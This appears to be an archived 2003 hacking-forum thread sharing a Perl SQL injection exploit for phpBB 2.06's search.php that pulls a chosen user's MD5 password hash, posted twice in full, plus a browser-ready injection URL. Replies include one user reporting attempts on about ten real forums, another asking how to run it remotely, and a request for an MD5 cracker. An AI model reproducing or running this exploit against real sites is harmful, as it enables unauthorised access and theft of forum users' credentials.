GaLiaRePt
Dec 21 2003, 10:17 AM
phpBB v2.06 search_id sql injection PoC exploitDate: 2003-12-21 Author : "f3sy1 f3sy1" <f3sy1@mail.ru> Download : http://www.security-corporation.com/downlo...r57phpbb-poc.pl | CODE | #!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * ðàáîòàåò òîëüêî ñ mysql v>4.0
## * ðàáîòàåò òîëüêî åñëè íà ôîðóìå íå óäàëåíî ñàìîå ïåðâîå ñîîáùåíèå
##
## Example:
## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4)
{
print "\n\n";
print "|****************************************************************|\n";
print " r57phpbb.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT reguest...
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat(char& #40;97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,
108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108
,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,3
4,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,5
9,115,58,51,50,58,34),user_password,char& #40;34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,5
8,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,5
9,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58
,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,11
0,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/* HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";}
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o |
Enjoy 
kust0m3fr
Dec 21 2003, 05:29 PM
thx i will try it..
dreedz
Dec 22 2003, 03:55 PM
didnt have any luck on the 10 or so forums i tried, code looking good though 
Iced_Eagle
Jan 23 2004, 08:09 AM
sorry that I need to bump this up  I really am. I am somewhat noobish to the whole security front. I am not sure exactly on how you would run this file? Would you compile it as a freestanding executable? How would you run this remotely? Sorry for the really noob questions Updated version with translated English comments at top | CODE | #!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * work only with mysql ver > 4.0
## * work only with post #1
##
## Example:
## C:\>r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] MD5 Hash for user with id=2 is: 5f4dcc3b5aa765d61d8327deb882cf99
##
if (@ARGV < 4)
{
print "\n\n";
print "|****************************************************************|\n";
print " r57phpbb.pl\n";
print " phpBB v<=2.06 search_id sql injection exploit (POC version)\n";
print " by RusH security team // www.rsteam.ru , http://rst.void.ru\n";
print " coded by f3sy1 & 1dt.w0lf // 16/12/2003\n";
print " Usage: r57phpbb-poc.pl <server> <folder> <user_id> <search_id>\n";
print " e.g.: r57phpbb-poc.pl 127.0.0.1 phpBB2 2 2\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id (2 default for phpBB admin)\n";
print " [~] <search_id> - play with this value for results\n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}
$success = 0;
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];
$search_id = $ARGV[3];
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";
# PROOF-OF-CONCEPT reguest...
print $socket "GET /$folder/search.php?search_id=$search_id%20union%20select%20concat
(char& #40;97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,
108,
116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,
109,
97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,11
2,108,
105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50
,58,34)
,user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,
59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83
,67,34,
59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,5
8,54,
58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95
,99,
104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=$user_id/*
HTTP/1.0\r\n\r\n";
print "[+] OK\n";
print "[~] wait for response...\n";
while ($answer = <$socket>)
{
if ($answer =~ /;highlight=/)
{
$success = 1;
@result=split(/;/,$answer);
@result2=split(/=/,$result[1]);
$result2[1]=~s/&/ /g;
print "[+] MD5 Hash for user with id=$user_id is: $result2[1]\n";
}
}
if ($success==0) {print "[-] exploit failed =(\n";}
## o---[ RusH security team | www.rsteam.ru | 2003 ]---o |
*edit* also, what is an efficient MD5 password hash decryptor? I found one 2 weeks ago, ran what I thought was MD5 pass and kept it running all day and night and nothing happened and i know i ran it right... any really really good ones out there GUI based preferably?
thanks!
570n3d
Jan 23 2004, 10:47 AM
how can i scan for this vulnerable
Iced_Eagle
Jan 23 2004, 03:53 PM
okay sorry that I can't find it directly on the internet but I have seen it
what you do to test for it is put the sql code into your web browser. If it gives you some sort of debug you are not vulnerable. If it gives you an sql error you are vulnerable
so if I ran www.icedeaglephp.com (if that is a real site sorry no offense)
| CODE |
www.icedeaglephp.com/phpBB2/search.php?search_id=$search_id%20union%20select%20concat(char& #40;97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,
108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108
,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,3
4,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,5
9,115,58,51,50,58,34),user_password,char& #40;34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,5
8,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,5
9,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58
,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,11
0,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[UID HERE]/* |
plz someone correct me if I am wrong.
Iced_Eagle
Jan 26 2004, 01:35 AM
*bump* plz I know somebody knows how to run this file remotely :\ really sorry for double post.... really sorry
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
